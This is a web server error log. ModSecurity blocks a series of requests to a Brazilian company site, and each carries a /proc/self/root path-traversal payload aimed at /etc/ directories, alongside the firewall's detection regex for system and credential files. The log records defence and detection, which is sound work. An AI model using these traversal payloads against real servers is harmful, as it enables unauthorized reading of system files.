[Fri Mar 20 03:45:20.333256 2026] [:error] [pid 15826:tid 140411582465792] [client 74.7.243.128:46686] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztAOoXxyEfFpUF8f9TjwAAAVM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:45:22.732565 2026] [:error] [pid 9818:tid 140411716749056] [client 74.7.241.31:57916] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztAl1pVZ5mVmJwsFMBjAAAAEM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:45:24.927885 2026] [:error] [pid 11167:tid 140411599251200] [client 74.7.243.128:39516] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztBPHIg5MgXLBnicPLfwAAAdE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:45:25.403747 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.241.31:57922] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztBda6ubjKNq_cu4aeJQAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:45:26.219016 2026] [:error] [pid 10189:tid 140411607643904] [client 74.7.243.128:39518] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztBjJ3M9BSuKP7CAbf3wAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:45:26.881936 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.241.31:57936] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztBta6ubjKNq_cu4aeJwAAA0Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:45:27.607708 2026] [:error] [pid 7893:tid 140411574073088] [client 74.7.243.128:39530] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztBxCii7xarUs8iHYz5gAAAhQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:45:28.243451 2026] [:error] [pid 7235:tid 140411590858496] [client 74.7.241.31:33034] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztCPqxLDW4GITHUkSxnwAAARI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:45:30.643549 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.241.31:33044] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztCta6ubjKNq_cu4aeKgAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:45:31.347499 2026] [:error] [pid 31215:tid 140411565680384] [client 74.7.243.128:39532] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztCwF0L0L-SsrnPo431gAAAtU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:45:31.962549 2026] [:error] [pid 11642:tid 140411616036608] [client 74.7.241.31:33050] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztC7ninkcc-iUj5AotnAAAA48"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:45:33.447381 2026] [:error] [pid 21219:tid 140411624429312] [client 74.7.241.31:33058] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztDfXLqtnMIWvjpaJo1AAAAo4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:45:33.860646 2026] [:error] [pid 21219:tid 140411708356352] [client 74.7.243.128:51448] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztDfXLqtnMIWvjpaJo1QAAAoQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:45:35.167966 2026] [:error] [pid 7235:tid 140411674785536] [client 74.7.243.128:51458] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztD_qxLDW4GITHUkSxpwAAAQg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:45:35.887981 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.241.31:33068] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztD-oXxyEfFpUF8f9TmAAAAUU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:45:37.558951 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.243.128:51462] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztEeoXxyEfFpUF8f9TmgAAAUQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:45:38.311046 2026] [:error] [pid 7235:tid 140411599251200] [client 74.7.241.31:33076] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztEvqxLDW4GITHUkSxrgAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:45:38.850837 2026] [:error] [pid 10189:tid 140411590858496] [client 74.7.243.128:51464] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztEjJ3M9BSuKP7CAbf6AAAAJI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:45:39.040723 2026] [:error] [pid 7235:tid 140411683178240] [client 74.7.241.31:33076] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztE_qxLDW4GITHUkSxrwAAAQc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:45:40.346925 2026] [:error] [pid 10189:tid 140411632822016] [client 74.7.241.31:41946] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztFDJ3M9BSuKP7CAbf6QAAAI0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:45:41.639172 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.241.31:41950] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztFda6ubjKNq_cu4aeMQAAA1Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
